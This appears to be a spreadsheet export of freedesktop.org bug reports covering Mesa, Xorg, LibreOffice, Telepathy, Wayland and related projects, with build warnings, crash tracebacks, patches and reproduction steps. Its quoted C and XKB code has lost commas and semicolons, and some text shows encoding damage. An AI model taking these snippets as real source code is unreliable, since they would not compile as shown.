  6-Core: AMD Ryzen 5 1600 type: MT MCP speed: 3132 MHz 
Graphics:
  Device-1: AMD Ellesmere [Radeon RX 470/480] driver: amdgpu v: kernel 
  Display: x11 server: X.Org 1.20.3 driver: amdgpu 
  resolution: 3840x2160~60Hz 
  OpenGL: renderer: Radeon RX 570 Series (POLARIS10 DRM 3.27.0 4.20.0-rc4+ 
  LLVM 7.0.1) 
  v: 4.5 Mesa 19.0.0-devel (git-70be9af 2019-01-02 cosmic-oibaf-ppa)</t>
  </si>
  <si>
    <t>MESA-30477</t>
  </si>
  <si>
    <t>r300_query.c:161: warning: â€˜resultâ€™ may be used uninitialized in this function</t>
  </si>
  <si>
    <t>mesa: e3ccfd4e03e6e2bf3f5a18be80f61819220b4c16 (master)
$ make linux-x86
...
gcc -c -I. -I../../../../src/gallium/include -I../../../../src/gallium/auxiliary -I../../../../src/gallium/drivers -I../../../../src/mesa/drivers/dri/r300/compiler -I../../../../src/gallium/winsys/drm/radeon/core -Wall -Wmissing-prototypes -Wdeclaration-after-statement -Wpointer-arith -O3 -g -fPIC -m32 -mmmx -msse -msse2 -D_POSIX_SOURCE -D_POSIX_C_SOURCE=199309L -D_SVID_SOURCE -D_BSD_SOURCE -D_GNU_SOURCE -DPTHREADS -DUSE_XSHM -DHAVE_POSIX_MEMALIGN -DUSE_X86_ASM -DUSE_MMX_ASM -DUSE_3DNOW_ASM -DUSE_SSE_ASM -I/usr/X11R6/include -std=c99 -ffast-math -fno-strict-aliasing  r300_query.c -o r300_query.o
r300_query.c: In function â€˜r300_render_conditionâ€™:
r300_query.c:161: warning: â€˜resultâ€™ may be used uninitialized in this function
src/gallium/drivers/r300/r300_query.c
   123  static boolean r300_get_query_result(struct pipe_context* pipe
   124                                       struct pipe_query* query
   125                                       boolean wait
   126                                       void* vresult)
   127  {
   128      struct r300_context* r300 = r300_context(pipe)
   129      struct r300_query *q = r300_query(query)
   130      unsigned flags i
   131      uint32_t temp *map
   132      uint64_t *result = (uint64_t*)vresult
   133  
   134      if (!q-&gt;flushed)
   135          pipe-&gt;flush(pipe 0 NULL)
   136  
   137      flags = PIPE_TRANSFER_READ | (!wait ? PIPE_TRANSFER_DONTBLOCK : 0)
   138  
   139      map = r300-&gt;rws-&gt;buffer_map(r300-&gt;rws q-&gt;buffer r300-&gt;cs flags)
   140      if (!map)
   141          return FALSE
   142  
   143      /* Sum up the results. */
   144      temp = 0
   145      for (i = 0 i num_results i++) {
   146          temp += *map
   147          map++
   148      }
   149  
   150      r300-&gt;rws-&gt;buffer_unmap(r300-&gt;rws q-&gt;buffer)
   151  
   152      *result = temp
   153      return TRUE
   154  }
...
   156  static void r300_render_condition(struct pipe_context *pipe
   157                                    struct pipe_query *query
   158                                    uint mode)
   159  {
   160      struct r300_context *r300 = r300_context(pipe)
   161      uint64_t result
   162      boolean wait
   163  
   164      if (query) {
   165          wait = mode == PIPE_RENDER_COND_WAIT ||
   166                 mode == PIPE_RENDER_COND_BY_REGION_WAIT
   167  
   168          if (!r300_get_query_result(pipe query wait &amp;result)) {
   169              r300-&gt;skip_rendering = FALSE
   170          }
   171  
   172          r300-&gt;skip_rendering = result == 0
   173      } else {
   174          r300-&gt;skip_rendering = FALSE
   175      }
   176  }</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-11246</t>
  </si>
  <si>
    <t>Chuvash keyboard layout</t>
  </si>
  <si>
    <t>It's the Chuvash keyboard layout. It's designed as a type of Russian keyboard layout  (as Tatar and Ossetian: https://bugs.freedesktop.org/show_bug.cgi?id=8092)
The Layout is based on the official Chuvash alphabet (http://en.wikipedia.org/wiki/Chuvash_language) and designed by th Chuvash.org community and done for xkeyboard-confing by me. This is only the file for .../xkb/symbols/ru
There must be additional information for .../rules/base.xml.in But I couldn't find this file. I would appriciate your help. 
here is my patch. I'm sorry I don't know how to add:
_________________________________________________________
partial alphanumeric_keys
xkb_symbols cv {
    include ru(winkeys)
    name[Group1]= Russia - Chuvash
    key.type[group1]=FOUR_LEVEL
    key         {        [      Cyrillic_u	Cyrillic_U
                            0x010004f3    0x010004f2      ]       }
    key         {        [      Cyrillic_ie     Cyrillic_IE
                       0x01000115	0x01000114     ]       }
    key         {        [      Cyrillic_a	Cyrillic_A
                          0x01000103  0x01000102      ]       }
    key         {        [      Cyrillic_es     Cyrillic_ES
                            ccedilla    Ccedilla      ]       }
    include level3(ralt_switch)
}</t>
  </si>
  <si>
    <t>mirontoli</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-8123</t>
  </si>
  <si>
    <t>Mac nodeadkeys variants are unusable</t>
  </si>
  <si>
    <t>... because pc(pc105) is not loaded.  Patch follows.</t>
  </si>
  <si>
    <t>LIBREOFFICE-32059</t>
  </si>
  <si>
    <t>Commands merge with variables</t>
  </si>
  <si>
    <t>When there is no space between commands (like rightarrow) and other elements like variables they merge and break the formula.
How to reproduce:
1. type a
2. in formula elements window select right arrow.
The result is arightarrow but it should have been a rightarrow.
The software should check if there is a space before inserted command. If there is no space insert one.
Alternatively command should be marked by some sort of marker like in LaTeX it is \ or in OpenOffice for symbols it is %.</t>
  </si>
  <si>
    <t>marcos.souza.org</t>
  </si>
  <si>
    <t>rudolfs.mazurs</t>
  </si>
  <si>
    <t>TELEPATHY-14483</t>
  </si>
  <si>
    <t>Text messages on MUC channels from the past</t>
  </si>
  <si>
    <t>When I join a MUC channel I get the last few messages sent by people when I
was not there because theses messages are stored by the MUC server so that it
can send them to me.
What do we do? Someone needs to think about it.
smcv suggested that the join sequence should be:
 (1) everyone except you appears in Members
 (2) past messages arrive
 (3) you move to Members</t>
  </si>
  <si>
    <t>POPPLER-55326</t>
  </si>
  <si>
    <t>Poppler fails to compile with lcms2 in nonstandard location</t>
  </si>
  <si>
    <t>qt4/poppler-document.cc requires lcms2 but the compilation does not include $(LCMS_INCLUDE).</t>
  </si>
  <si>
    <t>markus.moll</t>
  </si>
  <si>
    <t>PAPYON-28934</t>
  </si>
  <si>
    <t>telepathy-butterfly crashed with UnicodeDecodeError in _signal_text_received()</t>
  </si>
  <si>
    <t xml:space="preserve">the report was filed here:
https://bugs.edge.launchpad.net/ubuntu/+source/telepathy-butterfly/+bug/597381
Apport keeps raising warnings about this crash over and over again during an MSN conversation with Empathy on Maverick
telepathy-butterfly log said:
papyon/papyon.protocol.switchboard-INFO: 06/07/10 12:39:07.947190: Disconnected
papyon/papyon.transport-DEBUG: 06/07/10 12:39:24.689409: &gt;&gt;&gt; PNG
papyon/papyon.transport-DEBUG: 06/07/10 12:39:24.843189: &lt;&lt;&lt; QNG 42
papyon/papyon.transport-DEBUG: 06/07/10 12:39:42.766274: %20%20Mess%20with%20the%20Best%20Die%20Like%20the%20Rest!Ã¢â‚¬Å“ 2789003580 %3cmsnobj%20Creator%3d%22username%40hotmail.com%22%20Type%3d%223%22%20SHA1D%3d%220ms5pw%2fbntRiY8jAXZAu%2bf44Ufc%3d%22%20Size%3d%222674%22%20Location%3d%220%22%20Friendly%3d%22MgAwADcANwA1AF8AMQA0ADAAMQA1ADAANwAzADkANwAzADcANwBfADEAMgAyADMAMAA3ADkAMQA5ADQAXwAzADEAMQA3ADYAMAA1ADgAXwAAAA%3d%3d%22%2f%3e
butterfly/presence-INFO: 06/07/10 12:39:42.766985: Contact  presence changed to 'NLN'
papyon/papyon.transport-DEBUG: 06/07/10 12:39:42.767514: &lt;&lt;&lt; UBX username@hotmail.com 1 1033
	[payload]
butterfly/presence-INFO: 06/07/10 12:39:42.768047: Contact  presence changed to 'NLN'
butterfly/aliasing-INFO: 06/07/10 12:39:42.768312: Contact  alias changed to 'Lete..System Failure!!! DEJA_Vu--&gt;  Mess with the Best Die Like the Rest!Ã¢â‚¬Å“'
stderr-ERROR: 06/07/10 12:46:01.422: UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 74: ordinal not in range(128)
papyon/papyon.transport-DEBUG: 06/07/10 12:46:09.852227: %20%20Mess%20with%20the%20Best%20Die%20Like%20the%20Rest!Ã¢â‚¬Å“ 118
	TypingUser: 'username@hotmail.com'\r\n
	Content-Type: 'text/x-msmsgscontrol'\r\n
	MIME-Version: '1.0'\r\n
	\r\n
	\r\n
butterfly/textchannel-INFO: 06/07/10 12:46:09.852816: User  is typing
papyon/papyon.transport-DEBUG: 06/07/10 12:46:11.731398: %20%20Mess%20with%20the%20Best%20Die%20Like%20the%20Rest!Ã¢â‚¬Å“ 162
	X-MMS-IM-Format: 'FN=Times%20New%20Roman EF= CO=0 CS=0 PF=12'\r\n
	Content-Type: 'text/plain charset=UTF-8'\r\n
	MIME-Version: '1.0'\r\n
	\r\n
	tengo hambre
butterfly/textchannel-INFO: 06/07/10 12:46:11.732040: User  sent a message
stderr-ERROR: 06/07/10 12:46:11.735229: Traceback (most recent call last):
stderr-ERROR: 06/07/10 12:46:11.735343:   File /usr/lib/pymodules/python2.6/papyon/switchboard_manager.py line 348 in _sb_message_received
stderr-ERROR: 06/07/10 12:46:11.735490:     handler._on_message_received(message)
stderr-ERROR: 06/07/10 12:46:11.735554:   File /usr/lib/pymodules/python2.6/papyon/conversation.py line 362 in _on_message_received
stderr-ERROR: 06/07/10 12:46:11.735687:     self._dispatch(on_conversation_message_received sender msg)
stderr-ERROR: 06/07/10 12:46:11.735750:   File /usr/lib/pymodules/python2.6/papyon/event/__init__.py line 44 in _dispatch
stderr-ERROR: 06/07/10 12:46:11.735831:     if event_handler._dispatch_event(name *args):
stderr-ERROR: 06/07/10 12:46:11.735893:   File /usr/lib/pymodules/python2.6/papyon/event/__init__.py line 65 in _dispatch_event
stderr-ERROR: 06/07/10 12:46:11.735972:     handler(*params)
stderr-ERROR: 06/07/10 12:46:11.736035:   File /usr/lib/python2.6/dist-packages/butterfly/channel/text.py line 295 in on_conversation_message_received
stderr-ERROR: 06/07/10 12:46:11.736207:     self._signal_text_received(id timestamp handle type 0 message.display_name content)
stderr-ERROR: 06/07/10 12:46:11.736272:   File /usr/lib/python2.6/dist-packages/butterfly/channel/text.py line 167 in _signal_text_received
stderr-ERROR: 06/07/10 12:46:11.736370:     headers[dbus.String('sender-nickname')] = dbus.String(sender_nick)
stderr-ERROR: 06/07/10 12:46:11.736444: UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 74: ordinal not in range(128)
papyon/papyon.transport-DEBUG: 06/07/10 12:46:12.156076: &gt;&gt;&gt; PNG
papyon/papyon.transport-DEBUG: 06/07/10 12:46:12.313375: &lt;&lt;&lt; QNG 43
papyon/papyon.transport-DEBUG: 06/07/10 12:46:17.64171: %20%20Mess%20with%20the%20Best%20Die%20Like%20the%20Rest!Ã¢â‚¬Å“ 118
	TypingUser: 'username@hotmail.com'\r\n
	Content-Type: 'text/x-msmsgscontrol'\r\n
	MIME-Version: '1.0'\r\n
	\r\n
	\r\n
butterfly/textchannel-INFO: 06/07/10 12:46:17.64721: User  is typing
papyon/papyon.transport-DEBUG: 06/07/10 12:46:18.804887: %20%20Mess%20with%20the%20Best%20Die%20Like%20the%20Rest!Ã¢â‚¬Å“ 157
	X-MMS-IM-Format: 'FN=Times%20New%20Roman EF= CO=0 CS=0 PF=12'\r\n
	Content-Type: 'text/plain charset=UTF-8'\r\n
	MIME-Version: '1.0'\r\n
	\r\n
	tambien
butterfly/textchannel-INFO: 06/07/10 12:46:18.805529: User  sent a message
stderr-ERROR: 06/07/10 12:46:18.808697: Traceback (most recent call last):
stderr-ERROR: 06/07/10 12:46:18.808824:   File /usr/lib/pymodules/python2.6/papyon/switchboard_manager.py line 348 in _sb_message_received
stderr-ERROR: 06/07/10 12:46:18.808967:     handler._on_message_received(message)
stderr-ERROR: 06/07/10 12:46:18.809031:   File /usr/lib/pymodules/python2.6/papyon/conversation.py line 362 in _on_message_received
stderr-ERROR: 06/07/10 12:46:18.811625:     self._dispatch(on_conversation_message_received sender msg)
stderr-ERROR: 06/07/10 12:46:18.811949:   File /usr/lib/pymodules/python2.6/papyon/event/__init__.py line 44 in _dispatch
stderr-ERROR: 06/07/10 12:46:18.812247:     if event_handler._dispatch_event(name *args):
stderr-ERROR: 06/07/10 12:46:18.812541:   File /usr/lib/pymodules/python2.6/papyon/event/__init__.py line 65 in _dispatch_event
stderr-ERROR: 06/07/10 12:46:18.812849:     handler(*params)
stderr-ERROR: 06/07/10 12:46:18.813381:   File /usr/lib/python2.6/dist-packages/butterfly/channel/text.py line 295 in on_conversation_message_received
stderr-ERROR: 06/07/10 12:46:18.813791:     self._signal_text_received(id timestamp handle type 0 message.display_name content)
stderr-ERROR: 06/07/10 12:46:18.814096:   File /usr/lib/python2.6/dist-packages/butterfly/channel/text.py line 167 in _signal_text_received
stderr-ERROR: 06/07/10 12:46:18.814421:     headers[dbus.String('sender-nickname')] = dbus.String(sender_nick)
stderr-ERROR: 06/07/10 12:46:18.814724: UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 74: ordinal not in range(128)
</t>
  </si>
  <si>
    <t>LIBREOFFICE-71875</t>
  </si>
  <si>
    <t>FORMATTING: Visual C++ error on updating toc index with outline numbering</t>
  </si>
  <si>
    <t>Created attachment 89587
Screenshot Error OutlineNumberInIndex.png
Hello
Platform: windows 7/64 &amp; Version: 4.2.0.0.alpha1+
Build ID: 6788b92e15889beb151baf2b8ca8719f6ea38481
TinderBox: Win-x86@39 Branch:master Time: 2013-11-21_02:40:15
Description: Update an index causes a Visual C++ error if an outline numbering has been defined for the headings (see attached screenshot).
Steps to reproduce:
1. Open the TOC_OutlineNumbering.odt attached (text with one paragraph in heading1 style and with a toc)
2. Right click on the index then Update Index/Table
Expected result: index updated
Actual result: Error Assertion failed
Program ndtxt.cxx Line: 1796
Expression: rIdx &lt;= m_Text.getLength()
This problem does not occur with the TOC.odt attached (same text without outline numbering).
Note: the page number disappears after the update but this is another Issue: bug 71866
Regards
Pierre-Yves</t>
  </si>
  <si>
    <t>DRI-87394</t>
  </si>
  <si>
    <t>[BSW]Ogles1conform sporadically causes system hang and *ERROR* Timed out: waiting for media to ack</t>
  </si>
  <si>
    <t>Created attachment 110935
dmesg
==System Environment==
--------------------------
Libdrm:		(master)libdrm-2.4.58-19-gf99522e678dbbaffeca9462a8edcbe900574dc12
Mesa:		(master)873d7351c5a696b6f8493c907eb8c76b8cb632da
Xserver:	(master)xorg-server-1.16.99.901-98-g0f5fdaf600bfeada966aea942cb3e347d4efee30
Xf86_video_intel:(master)2.99.916-177-g99537089346ed7a1bc6b02349fad93845e865bb9
Libva:		(master)8986ec692b19d8dd6bd2aa118b5dffbd05a8f909
Libva_intel_driver:(master)b5d6d9d425a6d539b27d22992bda05f79d1a0622
Regression: not sure fail rate: ~1/5
Non-working platforms: BSW
==kernel==
--------------------------
drm-intel-nightly/8b7ac3dc495c2d02322bc751322331d2691089e5
commit 8b7ac3dc495c2d02322bc751322331d2691089e5
Author: Daniel Vetter 
Date:   Tue Dec 16 18:45:18 2014 +0100
    drm-intel-nightly: 2014y-12m-16d-17h-44m-52s UTC integration manifest
==Bug detailed description==
--------------------------
Run all Ogles1conform it sporadically causes system hang and *ERROR* Timed out: waiting for media to ack. Run multiple cycles it happens on different case.
==Reproduce steps==
---------------------------- 
1. xinit
2. run all Ogles1conform cases.</t>
  </si>
  <si>
    <t>XORG-47785</t>
  </si>
  <si>
    <t>Driver/rage128</t>
  </si>
  <si>
    <t>[r128] Make debug mode work again</t>
  </si>
  <si>
    <t>Created attachment 58952
Fix
R128TRACE cannot be defined without r128_version.h. I also had to remove three calls to it. One from a function that doesn't have a pScrn and two that reference RADEON macros from before the split.</t>
  </si>
  <si>
    <t>DRI-86683</t>
  </si>
  <si>
    <t>[BSW Bisected] HDMI screen goes black for a while when run testdisplay -i</t>
  </si>
  <si>
    <t>Created attachment 109981
dmesg
Environment:
--------------------------
Platform: BSW
Kernel: (drm-intel-nightly) 2014_11_25 ab4b258a6ea5f58b5cb17131aced8f9a8dd64499
Bug detailed description:
-----------------------------
We boot up the machine with HDMI and then run testdisplay -i screen will goes black for a while and then light up again. 
Steps:
---------------------------
Boot up with HDMI
./testdisplay -i</t>
  </si>
  <si>
    <t>DRI-60511</t>
  </si>
  <si>
    <t>[ivb] help with offset bug in lvds</t>
  </si>
  <si>
    <t>Hello all
I have been searching for the bug in the intel graphix i915 on the
internet. 
Where LVDS display has offset to left. When I use external monitors there is no problem. The case is only when I enable i915 modeset=1  then there is the offset. Without i915 there is no offset but I cant use external monitors.
And I have found this similar/same bug:
LVDS fixed-mode regression from 219adae1
I have Intel HD 4000 Core i5 dell latitude e6230
https://patchwork.kernel.org/patch/309832/
http://www.kerneltrap.org/mailarchive/linux-kernel/2010/11/8/4642488
I've tried to apply patch from these but without any success.
# uname -a
Linux 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
I put Low priority as I can use external monitor but I would like to use my laptop monitor too. Also I dont want to update kernel or upgrade distro. I have Ubuntu 10.04 LTS but with kernel 3.2.6
Please could someone give me some advice please?
Best Regards
--Gustaf</t>
  </si>
  <si>
    <t>gustafba</t>
  </si>
  <si>
    <t>XORG-24454</t>
  </si>
  <si>
    <t>use of unset ${fontrootdir} variable in font-util-1.1.0 build</t>
  </si>
  <si>
    <t>This line in font-util-1.1.0's configure.ac is wrong:
mapdir='${fontrootdir}/util'
Although the lowercase fontrootdir variable is set in the configure script in this case the variable isn't expanded until make sees it and the Makefile only has FONTROOTDIR set.  The line should be:
mapdir='${FONTROOTDIR}/util'</t>
  </si>
  <si>
    <t>prj+site+bugs.freedesktop.org</t>
  </si>
  <si>
    <t>WAYLAND-69267</t>
  </si>
  <si>
    <t>Putting a lot of data into wl_buffer can lead to SIGSEGV</t>
  </si>
  <si>
    <t>Hey
I just were browsing the code and I discovered that in wl_buffer_put is possible to put into buffer more than 8192 bytes at once which means that we will use memory which doesn't belong to wl_buffer. I don't know if it's on purpose (because I did some debugging and nowhere were passed such an amount of bytes) but still this can be a hole.
I successfully got SIGSEGV doing this:
...
...
void *long_data = malloc(big_number)
wl_connection_write(connection long_data big_number)
...
...</t>
  </si>
  <si>
    <t>mchqwerty</t>
  </si>
  <si>
    <t>DBUS-35767</t>
  </si>
  <si>
    <t>invoke_object_method leaks reports OOM if an out arg can't be marshalled</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #30171 +++
Somewhat similar to Bug #30171 if one of the two calls to _dbus_gvalue_marshal in invoke_object_model fails we'll return DBUS_HANDLER_RESULT_NEED_MEMORY to libdbus while leaking the GValues for any subsequent arguments.
The most likely cause for one of these calls to fail is programming error (e.g. a return value that can't be serialized like a non-UTF-8 string).</t>
  </si>
  <si>
    <t>POPPLER-59927</t>
  </si>
  <si>
    <t>make qt4 frontend thread-safe</t>
  </si>
  <si>
    <t>Created attachment 73724
thread-safe qt4 frontend
I found now the time to walk over the qt frontend and made the missing methods thread-safe.
I inserted again the POPPLER_QT4_THREADSAFE directive I needed it to compile okular correctly with either library but You can remove it if You don't want to have it.</t>
  </si>
  <si>
    <t>MESA-27831</t>
  </si>
  <si>
    <t>[regression] DynamicBranching3 does not render correctly</t>
  </si>
  <si>
    <t>Created attachment 35281
screenshot of the bug
Humus DynamicBranching3 no longer renders correctly. See screenshot comparing i965 with software rendering.
This worked as far back as 3817a54912a6c51fa0a7ec64787a69007bda44fa but could be tricky to bisect as both 7.8 and 7.7 causes the GPU to hang.
System environment:
-- chipset: G45 / ICH10R
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- Machine or mobo model: Asus P5Q-EM
-- Display connector: DVI
-- xf86-video-intel: 440b4d207b730112169827d0b90b46596659b504
-- xserver: 1.7.6.901
-- mesa: 7951630d0877fc3c293151ad6476bec7288e63c6
-- drm: cc20ed8100834b7a5129ed403dee6c0e15d82cd1
-- kernel: 2.6.34-rc4</t>
  </si>
  <si>
    <t>TELEPATHY-26712</t>
  </si>
  <si>
    <t>Telepathy-logger should support storing and retrieving favorite Telepathy contacts</t>
  </si>
  <si>
    <t>It'd be handy and nicely-centralized to have the Telepathy logger store and manage a set of favorite Telepathy contacts.
I've created a branch of the logger which adds and implements a simple API for this. The upside to doing this in one place is that different Telepathy-based IM clients can use the same set of favorites.
Danielle could you please review this?
You can browse my branch at the given URL (it's up-to-date with the mainline as of this writing).
The only change is the last commit (though it's several hundred lines splitting it didn't seem useful).
There are a few open questions (comments including the keyword XXX). One of the bigger ones (which may or may not still have a comment in my latest version) is whether the favorite contacts functionality should have its own namespace (vs. org.freedesktop.Telepathy.Logger[.DRAFT]).
I also wish I could have avoided the FavouriteContactsIsReady property and FavouriteContactsReady signal altogether. But there doesn't seem to be any other way that doesn't either expose a race condition between the logger deserializing the favorite contacts file or adding some excessive infrastructure (like queues for method calls that arrive between the start and end of that deserialization). Beyond that the first is gramatically awkward (and inappropriate for a property?) and they sound like synonyms to me anyhow.
I'm looking forward to any and all critiques.</t>
  </si>
  <si>
    <t>LIBSPECTRE-26592</t>
  </si>
  <si>
    <t>libspectre crashes while printing a ps file as a pdf file with evince</t>
  </si>
  <si>
    <t>Created attachment 33329
the ps document
On ubuntu Karmic 64-bit evince 2.28.1 libspectre 0.2.2.ds-2.
When I print the given ps document into a pdf document (using the ubuntu pdf printer) evince crashes. The stacktrace says that the crash concerns libspectre.</t>
  </si>
  <si>
    <t>arno.b.dev</t>
  </si>
  <si>
    <t>DRI-107467</t>
  </si>
  <si>
    <t>[CI] BSW KBL igt@kms_pipe_crc_basic@bad-source fail - Test assertion failure function test_bad_source</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/IGT_4585/fi-bsw-n3050/igt@kms_pipe_crc_basic@bad-source.html
(kms_pipe_crc_basic:3421) CRITICAL: Test assertion failure function test_bad_source file ../tests/kms_pipe_crc_basic.c:55:
(kms_pipe_crc_basic:3421) CRITICAL: Failed assertion: (*__errno_location ()) == 22
(kms_pipe_crc_basic:3421) CRITICAL: Last errno: 5 Input/output error
(kms_pipe_crc_basic:3421) CRITICAL: error: 5 != 22
Subtest bad-source failed.
**** DEBUG ****
(kms_pipe_crc_basic:3421) CRITICAL: Test assertion failure function test_bad_source file ../tests/kms_pipe_crc_basic.c:55:
(kms_pipe_crc_basic:3421) CRITICAL: Failed assertion: (*__errno_location ()) == 22
(kms_pipe_crc_basic:3421) CRITICAL: Last errno: 5 Input/output error
(kms_pipe_crc_basic:3421) CRITICAL: error: 5 != 22
(kms_pipe_crc_basic:3421) igt_core-INFO: Stack trace:
(kms_pipe_crc_basic:3421) igt_core-INFO:   #0 [__igt_fail_assert+0x180]
(kms_pipe_crc_basic:3421) igt_core-INFO:   #1 [test_bad_source+0xdb]
(kms_pipe_crc_basic:3421) igt_core-INFO:   #2 [__real_main177+0xc2]
(kms_pipe_crc_basic:3421) igt_core-INFO:   #3 [main+0x44]
(kms_pipe_crc_basic:3421) igt_core-INFO:   #4 [__libc_start_main+0xe7]
(kms_pipe_crc_basic:3421) igt_core-INFO:   #5 [_start+0x2a]</t>
  </si>
  <si>
    <t>DRI-104464</t>
  </si>
  <si>
    <t>Steam-Game Sam 3 BFE very low fps (less than 10fps)</t>
  </si>
  <si>
    <t>Created attachment 136507
dmesg log
Very low FPS running Steam-Game Sam 3 BFE (less than 10 fps) on CFL it is impossible to play due to this low performance.
Steps:
1.-run Sam 3 BFE Game
2.-Watch low performance</t>
  </si>
  <si>
    <t>MESA-36944</t>
  </si>
  <si>
    <t>Family Farm: misrenders on r600g</t>
  </si>
  <si>
    <t>Created attachment 46434
Screenshot of bug
The game Family Farm isn't rendering correctly on r600g I have attached screenshots showing the bug and correct rendering on llvmpipe.
System environment:
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- GPU: REDWOOD
-- Model: XFX Radeon HD 5670 1GB
-- Display connector: DVI
-- xf86-video-ati: 6.14.1
-- xserver: 1.10.1
-- mesa: 27d3e0b25cc3f2bd9f72778f0c9f54cb90c48622
-- drm: 2.4.25
-- kernel: 2.6.39-rc5</t>
  </si>
  <si>
    <t>LIBREOFFICE-46662</t>
  </si>
  <si>
    <t>FILEOPEN particular RTF document containing nested tables renders incorrectly</t>
  </si>
  <si>
    <t>Created attachment 57691
Sample document
Open the attached RTF Document crashes Writer.</t>
  </si>
  <si>
    <t>leslie_alistair</t>
  </si>
  <si>
    <t>TELEPATHY-27966</t>
  </si>
  <si>
    <t>Replace calls to gabble_value_array_build() with calls to tp_value_array_build()</t>
  </si>
  <si>
    <t>Gabble has a copy of tp_value_array_build() which we should purge.</t>
  </si>
  <si>
    <t>MESA-109451</t>
  </si>
  <si>
    <t>[IVBSNB] LINE_STRIPs following a TRIANGLE_FAN fail to use primitive restart</t>
  </si>
  <si>
    <t>Created attachment 143227
apitrace of example program
Originally reported as a Blender bug: https://developer.blender.org/T60762
(which it is not)
Using desktop GL 3.3+.
Steps to reproduce:
* prepare a vertex and index buffer
* enable GL_PRIMITIVE_RESTART
* draw a GL_TRIANGLE_FAN using those buffers
* draw any number of GL_LINE_STRIPs with those same buffers
Drawing a GL_TRIANGLE_FAN prior to GL_LINE_STRIPs makes the strip draw calls fail to use restart markers (here 0xFF) resulting in the line strips' supposedly unconnected strips being connected through a point of invalid coordinates (observed to consistently be (0 0 0)).
IOW restart markers seems to be (re-)considered as normal indices.
Interfering with GL calls that read or write to the index buffer makes the problem go away hinting at a GL state tracking or cache issue.</t>
  </si>
  <si>
    <t>perso</t>
  </si>
  <si>
    <t>OPENCLIPART.ORG-20460</t>
  </si>
  <si>
    <t>Broken Contact Form</t>
  </si>
  <si>
    <t>Clicking the Contact link from the sidebar results in a spartan file not found error.</t>
  </si>
  <si>
    <t>feneric</t>
  </si>
  <si>
    <t>MESA-62357</t>
  </si>
  <si>
    <t>llvmpipe: Fragment Shader with return in main causes back output</t>
  </si>
  <si>
    <t>We used a fragment shader in gnome-shell where we bail out early using
 if (...)
   return
inside main() ... the resulting color ended up being black even though the color has been set to a value before the if statement.
See https://bugzilla.gnome.org/show_bug.cgi?id=695607 for details.</t>
  </si>
  <si>
    <t>drago01</t>
  </si>
  <si>
    <t>XORG-9516</t>
  </si>
  <si>
    <t>Markup error in XAllocWMHints.3x</t>
  </si>
  <si>
    <t>Improper line wrap in .ds text.
--- XAllocWMHints.3x-orig	2006-12-19 01:39:41.000000000 -0500
+++ XAllocWMHints.3x	2006-12-19 01:39:51.000000000 -0500
@@ -468 +467 @@
 .\
 .ds xT X Toolkit Intrinsics \- C Language Interface
 .ds xW Athena X Widgets \- C Language X Toolkit Interface
-.ds xL Xlib \- C Language X Interface \fRO'Reilly and Associates Sebastopol
-1991. 
+.ds xL Xlib \- C Language X Interface \fRO'Reilly and Associates Sebastopol
1991. 
 .ds xC Inter-Client Communication Conventions Manual
 .na
 .de Ds</t>
  </si>
  <si>
    <t>MESA-1135</t>
  </si>
  <si>
    <t>severe opengl performance regression since mesa 6.1 merge</t>
  </si>
  <si>
    <t>(Ok I should have reported this when I noticed it not a few days before the
release...said that this bug is far from being critical - for me -)
Since the mesa 6.1 merge I noticed a severe performance regression: the effects
seem to be the same than having a non working dri except that this is working:
estel:~/.gaim/icons&gt; glxinfo 
name of display: :0.0
display: :0  screen: 0
direct rendering: Yes
diego@estel:~$ ldd `which glxgears`
                libGL.so.1 =&gt; /opt/xorg/lib/libGL.so.1 (0xb7f62000)
        libXp.so.6 =&gt; /opt/xorg/lib/libXp.so.6 (0xb7f58000)
        libXext.so.6 =&gt; /opt/xorg/lib/libXext.so.6 (0xb7f47000)
        libX11.so.6 =&gt; /opt/xorg/lib/libX11.so.6 (0xb7e64000)
        libpthread.so.0 =&gt; /lib/tls/i686/cmov/libpthread.so.0 (0x4a088000)
        libm.so.6 =&gt; /lib/tls/i686/cmov/libm.so.6 (0x4a04b000)
        libc.so.6 =&gt; /lib/tls/i686/cmov/libc.so.6 (0x49f0f000)
        libXxf86vm.so.1 =&gt; /opt/xorg/lib/libXxf86vm.so.1 (0xb7e5d000)
        libdl.so.2 =&gt; /lib/tls/i686/cmov/libdl.so.2 (0x4a070000)
        /lib/ld-linux.so.2 =&gt; /lib/ld-linux.so.2 (0x49ef6000)
diego@estel:~$ glxgears 
465 frames in 7.0 seconds = 66.429 FPS
393 frames in 6.0 seconds = 65.500 FPS
diego@estel:~$ LD_LIBRARY_PATH=/usr/lib ldd `which glxgears `
                libGL.so.1 =&gt; /usr/lib/libGL.so.1 (0xb7f74000)
        libXp.so.6 =&gt; /opt/xorg/lib/libXp.so.6 (0xb7f57000)
        libXext.so.6 =&gt; /opt/xorg/lib/libXext.so.6 (0xb7f46000)
        libX11.so.6 =&gt; /opt/xorg/lib/libX11.so.6 (0xb7e63000)
        libpthread.so.0 =&gt; /lib/tls/i686/cmov/libpthread.so.0 (0x4a088000)
        libm.so.6 =&gt; /lib/tls/i686/cmov/libm.so.6 (0x4a04b000)
        libc.so.6 =&gt; /lib/tls/i686/cmov/libc.so.6 (0x49f0f000)
        libdl.so.2 =&gt; /lib/tls/i686/cmov/libdl.so.2 (0x4a070000)
        /lib/ld-linux.so.2 =&gt; /lib/ld-linux.so.2 (0x49ef6000)
diego@estel:~$ LD_LIBRARY_PATH=/usr/lib glxgears  
2538 frames in 5.0 seconds = 507.600 FPS
2836 frames in 5.0 seconds = 567.200 FPS
glmatrix screensaver also goes from ~20-30 fps to ~1-2
Looks like all the work is done by the cpu despite of glxingo and X.org logs
saying the contrary.
0000:01:00.0 VGA compatible controller: ATI Technologies Inc RV280 [Radeon 9200
SE] (rev 01)</t>
  </si>
  <si>
    <t>LIBREOFFICE-43349</t>
  </si>
  <si>
    <t>mailmerge: Conditional text does not work</t>
  </si>
  <si>
    <t>Created attachment 53957
simple spreadsheet with some names and salutation
Checked with LibO 3.4.4 / Win 7
